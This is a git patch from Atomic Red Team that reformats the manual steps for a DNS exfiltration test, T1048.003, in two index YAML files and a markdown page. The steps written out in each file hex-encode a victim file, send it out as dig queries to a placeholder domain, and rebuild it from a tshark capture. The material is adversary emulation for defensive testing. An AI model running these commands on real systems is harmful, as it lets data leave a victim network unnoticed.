From a96f4212a5dc48ae8bfb7e55ccb15ba03439f143 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Wed, 3 Jul 2024 01:18:53 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 20 ++++++++++++-------- atomics/Indexes/linux-index.yaml | 20 ++++++++++++-------- atomics/T1048.003/T1048.003.md | 4 ++-- 3 files changed, 26 insertions(+), 18 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b77f0733..89efc53a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -117632,14 +117632,18 @@ exfiltration: supported_platforms: - linux executor: - steps: "1. On the adversary machine run the below command.\n\n tshark -f - \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name - matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run - the below commands.\n\n xxd -p input_file > encoded_data.hex | for data - in `cat encoded_data.hex`; do dig $data.domain; done\n \n3. Once the - data is received, use the below command to recover the data.\n\n cat - output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1 - | sort | uniq | xxd -p -r\n" + steps: | + 1. On the adversary machine run the below command. + + tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt + + 2. On the victim machine run the below commands. + + xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done + + 3. Once the data is received, use the below command to recover the data. + + cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r name: manual - name: Exfiltration Over Alternative Protocol - HTTP auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index 78b86181..aef87993 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -73666,14 +73666,18 @@ exfiltration: supported_platforms: - linux executor: - steps: "1. On the adversary machine run the below command.\n\n tshark -f - \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name - matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run - the below commands.\n\n xxd -p input_file > encoded_data.hex | for data - in `cat encoded_data.hex`; do dig $data.domain; done\n \n3. Once the - data is received, use the below command to recover the data.\n\n cat - output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1 - | sort | uniq | xxd -p -r\n" + steps: | + 1. On the adversary machine run the below command. + + tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt + + 2. On the victim machine run the below commands. + + xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done + + 3. Once the data is received, use the below command to recover the data. + + cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r name: manual - name: Python3 http.server auto_generated_guid: 3ea1f938-f80a-4305-9aa8-431bc4867313 diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md index b25ca41f..377020c7 100644 --- a/atomics/T1048.003/T1048.003.md +++ b/atomics/T1048.003/T1048.003.md @@ -114,12 +114,12 @@ Exfiltration of specified file over DNS protocol. #### Run it with these steps! 1. On the adversary machine run the below command. - tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt + tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt 2. On the victim machine run the below commands. xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done - + 3. Once the data is received, use the below command to recover the data. cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r